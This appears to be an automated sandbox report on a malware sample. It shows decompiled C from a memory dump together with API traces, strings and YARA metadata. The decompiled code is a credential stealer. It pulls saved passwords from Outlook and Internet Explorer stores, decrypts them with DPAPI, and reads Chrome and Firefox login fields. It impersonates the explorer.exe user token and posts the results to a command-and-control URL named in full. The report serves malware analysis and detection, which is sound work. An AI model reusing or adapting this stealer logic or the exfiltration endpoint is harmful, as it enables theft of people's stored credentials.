POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 00403C9E, 00403CBE
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00403B7A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
API String ID: 963220733-3240631248
Opcode ID: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
Instruction ID: e979f89f125927e8ba2600574156917aa8cba9cf8a6433267ee3f1946e8ad0ea
Opcode Fuzzy Hash: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
Instruction Fuzzy Hash: A351F772D00248EAEF11AFD1CC42BEDBFB9AF04345F14403AF510B61A1D7B95A95DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5D2, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040F5D2(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				char _v3076;
				int _v3080;
				int _v3084;
				intOrPtr _v3088;
				char _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				void* _t56;
				int _t61;
				void* _t66;

				_t66 = __ecx;
				E00409EFB(_a4,  &_v1028, _a20);
				E00409F46(_a4, _a8,  &_v2052, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
				_v3092 = 0x10;
				_v3088 = 2;
				_v3084 = 0;
				_v3080 = 0;
				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
				if(_v3100 == 0 || _v3096 == 0) {
					return _t56;
				} else {
					if(lstrcmpiA( &_v1028, "identification") == 0) {
						L4:
						_v3104 = 0xbeef0005;
						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
							L7:
							if(_v3104 != 0xbeef0007) {
								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
							} else {
								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
							}
							L10:
							_push(_v3096);
							L00410DCA();
							return _t61;
						}
						_v3104 = 0xbeef0006;
						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
							goto L7;
						}
						_v3104 = 0xbeef0007;
						_t61 = lstrcmpiA( &_v2052, "identities");
						if(_t61 != 0) {
							goto L10;
						}
						goto L7;
					}
					_t61 = lstrcmpiA( &_v1028, "identitymgr");
					if(_t61 != 0) {
						goto L10;
					}
					goto L4;
				}
			}

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

Part of subcall function 00409F46: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F82
Part of subcall function 00409F46: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F8B

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F61B
lstrcmpiA.KERNEL32(?,identification), ref: 0040F69B
lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 0040F6B0
lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 0040F6D3
lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F6F2
lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F711
CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F772

Strings

identities, xrefs: 0040F705
identitymgr, xrefs: 0040F6A4
inetcomm server passwords, xrefs: 0040F6C7
identification, xrefs: 0040F68F
outlook account manager passwords, xrefs: 0040F6E6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi$ByteCharFreeMultiTaskWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 636431001-4287852900
Opcode ID: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
Instruction ID: ea03687d9fb03fd5940d117c1db2d536975b738c704b47cbe732ea10429568b2
Opcode Fuzzy Hash: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
Instruction Fuzzy Hash: 2C412B7180021DEBEF319F91CE41FDA7B7ABF05304F0041A6BA08B6091DB799AD99F95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A9, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				int _t58;

				E00409EFB(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
					L5:
					_t58 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t58 == 0) {
						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x41442d != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t58 != 0) {
								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
								_t58 = LocalFree(_v2088);
							}
						}
					}
					L11:
					_push(_v2072);
					L00410DCA();
					return _t58;
				}
				_v2096 = 0xbeef0001;
				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
				if(_t58 != 0) {
					goto L11;
				}
				goto L5;
			}

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
LocalFree.KERNEL32(?), ref: 0040A331
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B

Strings

DPAPI: , xrefs: 0040A2B2
WininetCacheCredentials, xrefs: 0040A27A
Internet Explorer, xrefs: 0040A25B
MS IE FTP Passwords, xrefs: 0040A299

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$Local
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 1761448497-3076635702
Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEFE, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BEFE(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t49;
				int _t62;
				int _t76;
				void* _t79;

				_t79 = __ecx;
				if(_a16 != 0) {
					_t49 = _a16;
					if( *0x419158 < _t49 &&  *0x41915c < _t49 &&  *0x419160 < _t49) {
						E0040B1AB(_a12,  *0x419158,  &_v8,  &_v12,  &_v16);
						E0040B1AB(_a12,  *0x419160,  &_v20,  &_v24,  &_v28);
						_t49 = E0040B1AB(_a12,  *0x41915c,  &_v32,  &_v36,  &_v40);
						if(_v8 != 0 && _v32 != 0) {
							_v44 = E004017EC(_v8 + 1);
							_t62 = E00401823(_v16, _v44, _v8);
							_v48 = 0;
							_v52 = 0;
							if( *0x415824 != 0) {
								if( *0x415824 != 1) {
									if( *0x415824 == 2) {
										_t62 = 0;
									}
								} else {
									_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
								}
							} else {
								_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
								if(_t76 != 0) {
									_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
								}
								_t62 = _t76;
								if(_t62 != 0) {
									_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
								}
							}
							if(_t62 == 0) {
								if(_v20 != 0) {
									_v48 = E00408FA6(_t79, _v28, _v20);
								}
								_v52 = E00408FA6(_t79, _v40, _v32);
								if(_v44 != 0 && _v52 != 0) {
									E00401486(_a8, _a20);
									E004014E8(_a8, _v44);
									E004014E8(_a8, _v48);
									E004014E8(_a8, _v52);
								}
							}
							E004017D5(_v48);
							E004017D5(_v52);
							return E004017D5(_v44);
						}
					}
					return _t49;
				} else {
					return __eax;
				}
			}

APIs

lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 0040BFCE
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFDC
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFEA
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFF8
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C006
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C014

Strings

ftp://, xrefs: 0040BFC9, 0040BFD4
http://, xrefs: 0040BFE5, 0040BFF0
https://, xrefs: 0040C001, 0040C00C
ftp., xrefs: 0040C024, 0040C02F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: ftp.$ftp://$http://$https://
API String ID: 1659193697-2878239594
Opcode ID: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
Instruction ID: 2e0af54665fa65f75f976fb34723a380399be05cd310afd3f545fa98bd27941c
Opcode Fuzzy Hash: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
Instruction Fuzzy Hash: C941FC7280010AEBDF11AFE1DD45AEE7BB9AB08314F14823BF510B11B1D77D49A0EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040260B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040260B(char* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				char _v273;
				CHAR* _v280;
				long _t29;
				CHAR* _t36;
				void* _t37;
				void* _t48;
				void* _t49;

				_t48 = 0;
				if(RegCreateKeyA( *0x4140fe, "Software\\WinRAR",  &_v8) == 0) {
					if(RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12) == 0) {
						_t48 = 1;
					}
					RegCloseKey(_v8);
				}
				_t49 = _t48;
				if(_t49 == 0) {
					_t29 = GetTempPathA(0x104,  &_v273);
					if(_t29 != 0 && _t29 <= 0x104) {
						CreateDirectoryA( &_v273, 0);
						if(E004024D7( &_v273) != 0) {
							_t36 = E00401D15( &_v273, _a4);
						} else {
							_t36 = E00401D69(E00401D15( &_v273, "\\"), _a4);
						}
						_v280 = _t36;
						_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
						_v12 = _t37;
						if(_t37 + 1 != 0) {
							_t49 = E004013C2(_v12, _a8, _a12);
							CloseHandle(_v12);
						}
						_t49 = _t49;
						if(_t49 == 0) {
							DeleteFileA(_v280);
						}
						E004017D5(_v280);
					}
				}
				return _t49;
			}

0x00402615
0x0040262d
0x00402646
0x00402648
0x00402648
0x0040264c
0x0040264c
0x00402651
0x00402653
0x0040266a
0x0040266c
0x00402686
0x00402699
0x004026c1
0x0040269b
0x004026b0
0x004026b0
0x004026c6
0x004026e1
0x004026e6
0x004026ea
0x004026fa
0x004026ff
0x004026ff
0x00402704
0x00402706
0x0040270e
0x0040270e
0x00402719
0x00402719
0x0040266c
0x00402722

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402626
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040263F
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040264C
GetTempPathA.KERNEL32(00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402665
CreateDirectoryA.KERNEL32(?,00000000,00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402686
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?,?,004106C7), ref: 004026E1
CloseHandle.KERNEL32(?,?,00000000,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 004026FF
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 0040270E

Strings

Software\WinRAR, xrefs: 0040261B

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: 1107d3a25441767015e62f211fafef4a9089e3f7bb7bd245d32c9b34d5f5b1f3
Instruction ID: 17b1f1f750073906f68301a3bf6da54a844cbe047f9a048bb246b4ff058c1830
Opcode Fuzzy Hash: 1107d3a25441767015e62f211fafef4a9089e3f7bb7bd245d32c9b34d5f5b1f3
Instruction Fuzzy Hash: C7219F71A4020CBBDF21AFE1DD86FDD7A29AF14748F1004B6B604B50E1E6F99AD09B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402D57, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402D57(void* __ebx) {
				int _t25;
				void* _t33;
				void* _t36;
				void* _t45;
				void* _t49;
				int _t51;
				void* _t52;

				_t49 = __ebx;
				while(1) {
					L15:
					while(1) {
						L17:
						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
						L1:
						if(_t25 != 0) {
							L2:
							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
								L17:
								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
								goto L1;
							} else {
								L3:
								 *(_t52 - 0x13c) = 0;
								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
								_t51 =  *(_t52 - 0x13c);
								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
									continue;
								} else {
									L5:
									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
									if(_t36 == 0) {
										continue;
									} else {
										L6:
										 *(_t52 - 8) = _t36;
										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
											CloseHandle( *(_t52 - 8));
											continue;
											do {
												do {
													do {
														goto L17;
													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
													goto L3;
												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
												goto L5;
											} while (_t36 == 0);
											goto L6;
										} else {
											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
												CloseHandle( *(_t52 - 4));
												CloseHandle( *(_t52 - 8));
												goto L15;
											} else {
												_t49 = _t49 + 1;
												 *(_t52 - 0x140) = 0;
												_t45 = _t52 - 0x140;
												_push(_t45);
												_push(0xf003f);
												L00410E12();
												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
													 *0x4140fe =  *(_t52 - 0x140);
												}
												if( *((intOrPtr*)(_t52 + 8)) != 0) {
													 *__eax =  *(_t52 - 4);
												}
											}
										}
									}
								}
							}
						}
						CloseHandle( *(_t52 - 0x138));
						return _t49;
					}
				}
			}

0x00402d57
0x00402d69
0x00402d69
0x00402d73
0x00402d73
0x00402d80
0x00402c7f
0x00402c81
0x00402c87
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402cee
0x00402d05
0x00402d6e
0x00402d6e
0x00402d73
0x00402d73
0x00402d73
0x00000000
0x00000000
0x00000000
0x00402d73
0x00000000
0x00402d73
0x00000000
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d43
0x00402d43
0x00402d4e
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00402c9a
0x00402d90
0x00402d99
0x00402d99
0x00402d73

APIs

StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
CloseHandle.KERNEL32(00410B93), ref: 00402D6E
Process32Next.KERNEL32 ref: 00402D80
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA2E, Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 140
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t55;
				void* _t56;
				int _t77;
				int _t78;

				_t55 = __eax;
				if(_a16 == 0 ||  *0x41442d == 0) {
					return _t55;
				} else {
					_t56 = _a16;
					if( *0x41914c < _t56 &&  *0x419150 < _t56 &&  *0x419154 < _t56) {
						E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
						E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
						E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
						_push(_v32);
						_pop( *_t16);
						_push(_v40);
						_pop( *_t18);
						_v52 = 0;
						_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
						if(_t56 != 0 && _v52 != 0 && _v56 <= _v32) {
							asm("cld");
							asm("jecxz 0x4");
							memcpy(_v40, _v52, _v56);
							_push(_v56);
							_pop( *_t29);
							_t56 = LocalFree(_v52);
							if(_v8 != 0 && _v20 != 0 && _v32 != 0) {
								_v60 = E004017EC(_v8);
								E00401823(_v16, _v60, _v8);
								_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
								if(_t77 != 0) {
									_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
								}
								_t78 = _t77;
								if(_t78 != 0) {
									_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
								}
								if(_t78 == 0) {
									E00401486(_a8, _a20);
									E00401486(_a8,  *0x419148);
									E004014BC(_a8, _v16, _v8);
									E004014BC(_a8, _v28, _v20);
									E004014BC(_a8, _v40, _v32);
								}
								return E004017D5(_v60);
							}
						}
					}
					return _t56;
				}
			}

APIs

LocalFree.KERNEL32(00000000,?), ref: 0040BB20
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7

Strings

http://, xrefs: 0040BB78, 0040BB83
https://, xrefs: 0040BB94, 0040BB9F
ftp://, xrefs: 0040BB5C, 0040BB67

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: ftp://$http://$https://
API String ID: 1884169789-2804853444
Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B973, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040B973(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E0040282C(_a4);
				_t14 = StrStrIA(_a4, 0x415c5b);
				if(_t14 != 0) {
					 *_t14 = 0;
					E0040282C(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "origin_url") == 0) {
									_push(_a8);
									_pop( *0x41914c);
								}
								if(lstrcmpiA(_a4, "password_value") == 0) {
									_push(_a8);
									_pop( *0x419150);
								}
								if(lstrcmpiA(_a4, "username_value") == 0) {
									_push(_a8);
									_pop( *0x419154);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}

APIs

Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860

StrStrIA.SHLWAPI(?,00415C5B), ref: 0040B987
lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040B9A9

Strings

origin_url, xrefs: 0040B9D6
CONSTRAINT, xrefs: 0040B9A0, 0040B9A8
username_value, xrefs: 0040BA0A
password_value, xrefs: 0040B9F0

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
Instruction ID: d1a5d0e1c88d5ff09c1e1cca62af422fdfc66f56267979ae8e6772905978206e
Opcode Fuzzy Hash: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
Instruction Fuzzy Hash: D7118677210505F9CF522F65DC02ADE3E51EB66398B008137F519A81A1E3BDCDD1968C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE43, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040BE43(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E0040282C(_a4);
				_t14 = StrStrIA(_a4, 0x415c5b);
				if(_t14 != 0) {
					 *_t14 = 0;
					E0040282C(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "hostname") == 0) {
									_push(_a8);
									_pop( *0x419158);
								}
								if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
									_push(_a8);
									_pop( *0x41915c);
								}
								if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
									_push(_a8);
									_pop( *0x419160);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}

APIs

Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860

StrStrIA.SHLWAPI(?,00415C5B), ref: 0040BE57
lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040BE79

Strings

encryptedPassword, xrefs: 0040BEC0
encryptedUsername, xrefs: 0040BEDA
CONSTRAINT, xrefs: 0040BE70, 0040BE78
hostname, xrefs: 0040BEA6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
API String ID: 3649823140-2971371156
Opcode ID: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
Instruction ID: c71311dfb796d292e15c99594d8fb0fbbefb30d41f24959de37fc513c87e5bbe
Opcode Fuzzy Hash: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
